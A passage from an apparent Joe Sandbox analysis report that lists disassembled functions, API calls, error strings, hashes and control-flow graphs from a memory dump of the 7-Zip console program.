                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrow$free$wcscmp
                                                                                                                                                                                                • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
                                                                                                                                                                                                • API String ID: 1252877886-1892825451
                                                                                                                                                                                                • Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                • Instruction ID: 031377c94f326687f64cda034c55dac601bf13bd76785dbaa8cd5f73870235a0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A52D3733086C5A7DB28DF3AD1907AEBB65F395744F888016DB9903B22DB78D5A9C700
                                                                                                                                                                                                Function 00951D04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                • String ID: SeSecurityPrivilege
                                                                                                                                                                                                • API String ID: 1313864721-2333288578
                                                                                                                                                                                                • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                • Instruction ID: 720abb18b157f62c6f12f5407e9aee222e95bd5cdcdc566a897668145effe459
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                • Instruction Fuzzy Hash: 08116376208B44C2DA00CF12F95436DB3BAFBC5B85F945416EA8B42B95CF3CC549CB10
                                                                                                                                                                                                Function 0094AC74 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0094AC84
                                                                                                                                                                                                • OpenProcessToken.ADVAPI32 ref: 0094AC95
                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32 ref: 0094ACA9
                                                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,0094F928), ref: 0094ACE0
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,0094F928), ref: 0094ACEA
                                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 0094ACFA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3398352648-0
                                                                                                                                                                                                • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                • Instruction ID: f42cff5d4b36c5dd0dd132e1fadeb8d22a87dd282c54a1ed6f23addf27d4c17f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1501527361468187DB108FA4F89479A7361F785B85F649135EB8A83B55CF3CC48DCB00
                                                                                                                                                                                                Function 00947978 Relevance: 4.6, APIs: 3, Instructions: 70fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0094794C: FindClose.KERNELBASE ref: 0094795E
                                                                                                                                                                                                • FindFirstFileW.KERNELBASE ref: 009479BA
                                                                                                                                                                                                  • Part of subcall function 0094339C: free.MSVCRT ref: 009433D7
                                                                                                                                                                                                  • Part of subcall function 0094339C: memmove.MSVCRT(00000000,?,?,00000000,009410A8), ref: 009433F2
                                                                                                                                                                                                • FindFirstFileW.KERNELBASE ref: 009479FA
                                                                                                                                                                                                • free.MSVCRT ref: 00947A08
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Find$FileFirstfree$Closememmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2921071498-0
                                                                                                                                                                                                • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                • Instruction ID: 23fc21b28a6e11eb3644afa96126e8e604a028dce24d44fc8023e11178ee3daf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 09213C36208A8486DB21DF64E45075DA364F78A7B8F548320EAB9477D9DF38CA09C740
                                                                                                                                                                                                Function 00954418 Relevance: 219.6, APIs: 132, Strings: 13, Instructions: 2096COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                                                                                                                                                • API String ID: 0-2438533581
                                                                                                                                                                                                • Opcode ID: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                • Instruction ID: f5868c8dfc5f1054c28f7bcf617767e1c0d21236ef0a8815d0984c91a39a182f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 05037332249AC082CA34EB26E4507AEB765F7C6BC5F954112EF9E47B25DF79C889C700
                                                                                                                                                                                                Function 0098950D Relevance: 116.2, APIs: 48, Strings: 18, Instructions: 748COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 1016 98950d-989510 1017 989a40-989a8e call 942130 1016->1017 1018 989516-989529 call 94ed74 1016->1018 1028 989a90-989aa0 call 943314 1017->1028 1029 989aa2 1017->1029 1024 98952f-989537 1018->1024 1025 989820-989828 1018->1025 1030 989539-989541 1024->1030 1031 989557-9895d5 call 983230 call 943208 1024->1031 1026 98982e-98983f call 9878a8 1025->1026 1027 9899e4-9899ee 1025->1027 1046 98984c-98994d call 986990 call 942bc8 call 967880 call 942bc8 call 942cdc call 986c04 1026->1046 1047 989841-989845 1026->1047 1037 989a20-989a3f _CxxThrowException 1027->1037 1038 9899f0-989a1b call 942300 fputs * 2 call 942300 1027->1038 1035 989aa5-989ac8 call 94b8f0 call 942130 1028->1035 1029->1035 1030->1031 1034 989543-989552 call 943518 1030->1034 1054 9895e5 1031->1054 1055 9895d7-9895df 1031->1055 1034->1031 1058 989aca-989ada call 943314 1035->1058 1059 989adc 1035->1059 1037->1017 1038->1037 1100 98994f 1046->1100 1101 989980-9899df free * 5 call 986a20 1046->1101 1047->1046 1061 9895e8-989631 call 943404 call 98780c 1054->1061 1055->1054 1060 9895e1-9895e3 1055->1060 1064 989adf-989c8b call 94b8f0 call 942130 1058->1064 1059->1064 1060->1061 1079 98963e-98964d 1061->1079 1080 989633-989637 1061->1080 1090 989c9a 1064->1090 1091 989c8d-989c98 call 987414 1064->1091 1083 98964f-989657 1079->1083 1084 989663 1079->1084 1080->1079 1083->1084 1087 989659-989661 1083->1087 1088 98966b-98972c call 943404 call 986990 call 942bc8 1084->1088 1087->1088 1117 98972f call 9799b8 1088->1117 1095 989c9d-989ca8 1090->1095 1091->1095 1097 989caa-989cb3 1095->1097 1098 989cb4-989d77 call 943404 1095->1098 1097->1098 1114 989d79-989d7d 1098->1114 1115 989d83-989e8a call 9871ec call 943404 call 94ef70 call 943208 call 966be0 1098->1115 1105 989953-989969 1100->1105 1116 98a5ad-98a5b5 1101->1116 1110 98997b-98997e 1105->1110 1111 98996b-989976 free * 2 1105->1111 1110->1101 1110->1105 1111->1110 1114->1115 1159 989e8c-989eb4 call 966e08 1115->1159 1160 989ed2-989f44 call 965458 1115->1160 1119 98a5c5-98a5c8 1116->1119 1120 98a5b7-98a5be 1116->1120 1124 989734-98973f 1117->1124 1122 98a5ca-98a5e6 _CxxThrowException 1119->1122 1123 98a5e7-98a603 free 1119->1123 1120->1119 1121 98a5c0 1120->1121 1126 98a5c0 call 9866a8 1121->1126 1122->1123 1127 98a605 1123->1127 1128 98a626-98a637 free call 96a13c 1123->1128 1129 989750-989798 call 986c04 1124->1129 1130 989741-98974b call 98b1c8 1124->1130 1126->1119 1132 98a609-98a624 free 1127->1132 1137 98a63c-98a675 call 987080 call 94182c call 987f50 1128->1137 1141 98979a 1129->1141 1142 9897cb-98981b free * 3 call 986a20 free call 98b310 1129->1142 1130->1129 1132->1128 1132->1132 1162 98a6a8-98a6c9 free 1137->1162 1163 98a677 1137->1163 1146 98979e-9897b4 1141->1146 1142->1116 1150 9897c6-9897c9 1146->1150 1151 9897b6-9897c1 free * 2 1146->1151 1150->1142 1150->1146 1151->1150 1159->1160 1172 989eb6-989ed1 _CxxThrowException 1159->1172 1169 989f49-989f53 1160->1169 1166 98a67b-98a691 1163->1166 1170 98a6a3-98a6a6 1166->1170 1171 98a693-98a69e free * 2 1166->1171 1173 989f60-989f68 1169->1173 1174 989f55-989f5b call 98b1c8 1169->1174 1170->1162 1170->1166 1171->1170 1172->1160 1176 989f6a-989f74 1173->1176 1177 989fbd-989fca 1173->1177 1174->1173 1180 989fb1-989fb9 1176->1180 1181 989f76-989fac call 942300 fputs call 942300 call 942320 call 942300 1176->1181 1178 98a02c-98a033 1177->1178 1179 989fcc-989fcf call 942300 1177->1179 1182 98a063-98a06a 1178->1182 1183 98a035-98a03a 1178->1183 1189 989fd4-989fdc 1179->1189 1180->1177 1181->1180 1187 98a06c-98a071 1182->1187 1188 98a09e-98a0a1 1182->1188 1183->1182 1186 98a03c-98a05e fputs call 9426a0 call 942300 1183->1186 1186->1182 1193 98a114-98a11b 1187->1193 1194 98a077-98a099 fputs call 9426a0 call 942300 1187->1194 1188->1193 1196 98a0a3-98a0aa 1188->1196 1189->1178 1195 989fde-98a027 fputs call 9426a0 call 942300 fputs call 9426a0 call 942300 1189->1195 1203 98a15c-98a15f 1193->1203 1204 98a11d-98a122 1193->1204 1194->1188 1195->1178 1197 98a0ac-98a0ce fputs call 9426a0 call 942300 1196->1197 1198 98a0d3-98a0da 1196->1198 1197->1198 1198->1193 1207 98a0dc-98a0eb call 942300 1198->1207 1208 98a16c-98a16f 1203->1208 1209 98a161 1203->1209 1204->1209 1213 98a124-98a133 call 942300 1204->1213 1207->1193 1232 98a0ed-98a10f fputs call 9426a0 call 942300 1207->1232 1217 98a320-98a50a free * 2 call 966b58 free call 987968 1208->1217 1218 98a175-98a17c 1208->1218 1209->1208 1213->1209 1231 98a135-98a157 fputs call 9426a0 call 942300 1213->1231 1269 98a50c 1217->1269 1270 98a53d-98a559 free 1217->1270 1227 98a182-98a189 1218->1227 1228 98a2e7-98a2f6 call 942300 1218->1228 1227->1228 1234 98a18f-98a192 1227->1234 1228->1217 1243 98a2f8-98a31f fputs call 9426a0 call 942300 1228->1243 1231->1203 1232->1193 1234->1217 1241 98a198-98a1a3 1234->1241 1247 98a1d5-98a1de 1241->1247 1248 98a1a5-98a1cd fputs call 9426a0 call 942300 1241->1248 1243->1217 1249 98a1e0-98a1e3 1247->1249 1250 98a1f3-98a223 fputs call 9426a0 call 942300 1247->1250 1248->1247 1249->1250 1255 98a1e5-98a1ed 1249->1255 1260 98a275-98a2c3 fputs call 9426a0 call 942300 fputs call 9426a0 call 942300 1250->1260 1278 98a225-98a270 fputs call 9426a0 call 942300 fputs call 9426a0 call 942300 1250->1278 1255->1250 1255->1260 1291 98a2c8-98a2cb 1260->1291 1275 98a510-98a526 1269->1275 1271 98a55b 1270->1271 1272 98a58c-98a599 free 1270->1272 1276 98a55f-98a575 1271->1276 1272->1116 1279 98a538-98a53b 1275->1279 1280 98a528-98a533 free * 2 1275->1280 1281 98a587-98a58a 1276->1281 1282 98a577-98a582 free * 2 1276->1282 1278->1260 1279->1270 1279->1275 1280->1279 1281->1272 1281->1276 1282->1281 1291->1217 1293 98a2cd-98a2e5 call 942300 call 98291c 1291->1293 1293->1217
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrowfputs$fputc
                                                                                                                                                                                                • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                                                                                                                                                • API String ID: 1639683984-435538426
                                                                                                                                                                                                • Opcode ID: 0bba5815698ffe19a5e1efa49293ddbd27b3fdb07db2a727c2502226ce748b33
                                                                                                                                                                                                • Instruction ID: 6d1053d53b3a4a780c131310ded06ad950aa3eced8e8d80860eed58017b2adf8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bba5815698ffe19a5e1efa49293ddbd27b3fdb07db2a727c2502226ce748b33
                                                                                                                                                                                                • Instruction Fuzzy Hash: EC728A72309AC095DA34EF24E8907EEB3A4F7C6B84F844526EA9E47B19DF38C555CB01
                                                                                                                                                                                                Function 00989B5D Relevance: 84.5, APIs: 33, Strings: 15, Instructions: 507COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 1833 989b5d-989b5f 1834 989b79-989c1f call 98057c call 943208 call 9638e8 free 1833->1834 1835 989b61-989b74 fputs call 942300 1833->1835 1843 989c30-989c33 1834->1843 1844 989c21-989c2b call 98b1c8 1834->1844 1835->1834 1846 989c54-989c8b call 98b310 call 942130 1843->1846 1847 989c35-989c3c 1843->1847 1844->1843 1857 989c9a 1846->1857 1858 989c8d-989c98 call 987414 1846->1858 1847->1846 1848 989c3e-989c4e call 980994 1847->1848 1852 989c53 1848->1852 1852->1846 1860 989c9d-989ca8 1857->1860 1858->1860 1861 989caa-989cb3 1860->1861 1862 989cb4-989d77 call 943404 1860->1862 1861->1862 1867 989d79-989d7d 1862->1867 1868 989d83-989e8a call 9871ec call 943404 call 94ef70 call 943208 call 966be0 1862->1868 1867->1868 1879 989e8c-989eb4 call 966e08 1868->1879 1880 989ed2-989f53 call 965458 1868->1880 1879->1880 1885 989eb6-989ed1 _CxxThrowException 1879->1885 1886 989f60-989f68 1880->1886 1887 989f55-989f5b call 98b1c8 1880->1887 1885->1880 1889 989f6a-989f74 1886->1889 1890 989fbd-989fca 1886->1890 1887->1886 1893 989fb1-989fb9 1889->1893 1894 989f76-989fac call 942300 fputs call 942300 call 942320 call 942300 1889->1894 1891 98a02c-98a033 1890->1891 1892 989fcc-989fcf call 942300 1890->1892 1895 98a063-98a06a 1891->1895 1896 98a035-98a03a 1891->1896 1902 989fd4-989fdc 1892->1902 1893->1890 1894->1893 1900 98a06c-98a071 1895->1900 1901 98a09e-98a0a1 1895->1901 1896->1895 1899 98a03c-98a05e fputs call 9426a0 call 942300 1896->1899 1899->1895 1906 98a114-98a11b 1900->1906 1907 98a077-98a099 fputs call 9426a0 call 942300 1900->1907 1901->1906 1909 98a0a3-98a0aa 1901->1909 1902->1891 1908 989fde-98a027 fputs call 9426a0 call 942300 fputs call 9426a0 call 942300 1902->1908 1916 98a15c-98a15f 1906->1916 1917 98a11d-98a122 1906->1917 1907->1901 1908->1891 1910 98a0ac-98a0ce fputs call 9426a0 call 942300 1909->1910 1911 98a0d3-98a0da 1909->1911 1910->1911 1911->1906 1920 98a0dc-98a0eb call 942300 1911->1920 1921 98a16c-98a16f 1916->1921 1922 98a161 1916->1922 1917->1922 1926 98a124-98a133 call 942300 1917->1926 1920->1906 1945 98a0ed-98a10f fputs call 9426a0 call 942300 1920->1945 1930 98a320-98a50a free * 2 call 966b58 free call 987968 1921->1930 1931 98a175-98a17c 1921->1931 1922->1921 1926->1922 1944 98a135-98a157 fputs call 9426a0 call 942300 1926->1944 1982 98a50c 1930->1982 1983 98a53d-98a559 free 1930->1983 1940 98a182-98a189 1931->1940 1941 98a2e7-98a2f6 call 942300 1931->1941 1940->1941 1947 98a18f-98a192 1940->1947 1941->1930 1956 98a2f8-98a31f fputs call 9426a0 call 942300 1941->1956 1944->1916 1945->1906 1947->1930 1954 98a198-98a1a3 1947->1954 1960 98a1d5-98a1de 1954->1960 1961 98a1a5-98a1cd fputs call 9426a0 call 942300 1954->1961 1956->1930 1962 98a1e0-98a1e3 1960->1962 1963 98a1f3-98a223 fputs call 9426a0 call 942300 1960->1963 1961->1960 1962->1963 1968 98a1e5-98a1ed 1962->1968 1973 98a275-98a2c3 fputs call 9426a0 call 942300 fputs call 9426a0 call 942300 1963->1973 1992 98a225-98a270 fputs call 9426a0 call 942300 fputs call 9426a0 call 942300 1963->1992 1968->1963 1968->1973 2016 98a2c8-98a2cb 1973->2016 1988 98a510-98a526 1982->1988 1984 98a55b 1983->1984 1985 98a58c-98a5b5 free 1983->1985 1989 98a55f-98a575 1984->1989 1999 98a5c5-98a5c8 1985->1999 2000 98a5b7-98a5be 1985->2000 1993 98a538-98a53b 1988->1993 1994 98a528-98a533 free * 2 1988->1994 1995 98a587-98a58a 1989->1995 1996 98a577-98a582 free * 2 1989->1996 1992->1973 1993->1983 1993->1988 1994->1993 1995->1985 1995->1989 1996->1995 2002 98a5ca-98a5e6 _CxxThrowException 1999->2002 2003 98a5e7-98a603 free 1999->2003 2000->1999 2001 98a5c0 call 9866a8 2000->2001 2001->1999 2002->2003 2007 98a605 2003->2007 2008 98a626-98a637 free call 96a13c 2003->2008 2011 98a609-98a624 free 2007->2011 2015 98a63c-98a675 call 987080 call 94182c call 987f50 2008->2015 2011->2008 2011->2011 2031 98a6a8-98a6c9 free 2015->2031 2032 98a677 2015->2032 2016->1930 2019 98a2cd-98a2e5 call 942300 call 98291c 2016->2019 2019->1930 2033 98a67b-98a691 2032->2033 2035 98a6a3-98a6a6 2033->2035 2036 98a693-98a69e free * 2 2033->2036 2035->2031 2035->2033 2036->2035
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputcfputsfree
                                                                                                                                                                                                • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                                                                                                                                                                                • API String ID: 2822829076-727241755
                                                                                                                                                                                                • Opcode ID: 76881a621ad82756a4bf301af10dc41923f0376f2db4c6d33a7aae10c23e2ed1
                                                                                                                                                                                                • Instruction ID: d16a89609383cf343321abb4ac62521632fefc2b461ce2ab5c5811df026b34f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 76881a621ad82756a4bf301af10dc41923f0376f2db4c6d33a7aae10c23e2ed1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 03224532309AC191DA34EF25E8917EEB3A4F7C6B84F845126EA9E43B19DF38C595C701
                                                                                                                                                                                                Function 0096A180 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 342libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2649 96a180-96a1e9 GetProcAddress * 2 2650 96a214-96a22a GetProcAddress 2649->2650 2651 96a1eb-96a1fe GetProcAddress 2649->2651 2652 96a233-96a23e 2650->2652 2654 96a22c-96a22e 2650->2654 2651->2652 2653 96a200-96a20d 2651->2653 2656 96a244-96a2f0 call 943208 call 968928 2652->2656 2657 96a729 2652->2657 2653->2652 2660 96a20f 2653->2660 2655 96a72b-96a73e 2654->2655 2664 96a2f6-96a30a 2656->2664 2665 96a648 2656->2665 2657->2655 2660->2655 2667 96a31c-96a321 2664->2667 2668 96a30c-96a31a 2664->2668 2666 96a718-96a727 call 9694a8 2665->2666 2666->2655 2671 96a328-96a32b 2667->2671 2668->2671 2673 96a32d-96a345 call 94ae2c call 9694a8 2671->2673 2674 96a34a-96a350 2671->2674 2692 96a634-96a63d 2673->2692 2676 96a352-96a36a call 94ae2c call 9694a8 2674->2676 2677 96a36f-96a37d SysStringByteLen 2674->2677 2676->2692 2679 96a383-96a3e3 call 94ae2c * 2 call 943208 * 2 call 968928 2677->2679 2680 96a64d-96a65d call 94ae2c 2677->2680 2701 96a662-96a678 free * 2 2679->2701 2702 96a3e9-96a40c call 968928 2679->2702 2680->2666 2692->2656 2694 96a643 2692->2694 2694->2657 2701->2666 2705 96a412-96a485 call 969d98 call 9687a8 call 968860 2702->2705 2706 96a67d-96a693 free * 2 2702->2706 2713 96a48b-96a49c 2705->2713 2714 96a698-96a6ae free * 2 2705->2714 2706->2666 2715 96a4ee-96a51b call 969380 2713->2715 2716 96a49e-96a4a5 2713->2716 2714->2666 2721 96a6b0-96a6d1 free * 3 2715->2721 2722 96a521-96a526 2715->2722 2718 96a4ab-96a4d9 call 9687a8 2716->2718 2726 96a4e5-96a4ec 2718->2726 2727 96a4db-96a4de 2718->2727 2721->2666 2724 96a541-96a564 call 969380 2722->2724 2725 96a528-96a53f call 9698d4 2722->2725 2733 96a6d3-96a6f4 free * 3 2724->2733 2734 96a56a-96a57e call 96a034 2724->2734 2732 96a583-96a5b7 call 968860 2725->2732 2726->2715 2726->2718 2727->2726 2738 96a6f6-96a715 free * 3 2732->2738 2739 96a5bd-96a5c0 2732->2739 2733->2666 2734->2732 2738->2666 2740 96a5c2-96a5ca 2739->2740 2741 96a5cf-96a5e4 call 942130 2739->2741 2740->2741 2744 96a5e6-96a5f1 call 969af0 2741->2744 2745 96a5f8 2741->2745 2748 96a5f6 2744->2748 2747 96a5fb-96a62f call 94b8f0 free * 3 call 9694a8 2745->2747 2747->2692 2748->2747
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                                • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                                                                                                                                                                                • API String ID: 190572456-3984264347
                                                                                                                                                                                                • Opcode ID: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                • Instruction ID: 7c0ba5aa431f9a4e2e8f90e57b1454354dcf046cc5d9134f0edb4c565b368f6e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89D16472359AC096CB20EB21E850B9EB3A4F7C5B80F845521EA8E57B29DF7CC545CF01
                                                                                                                                                                                                Function 009470C8 Relevance: 40.7, APIs: 27, Instructions: 237COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

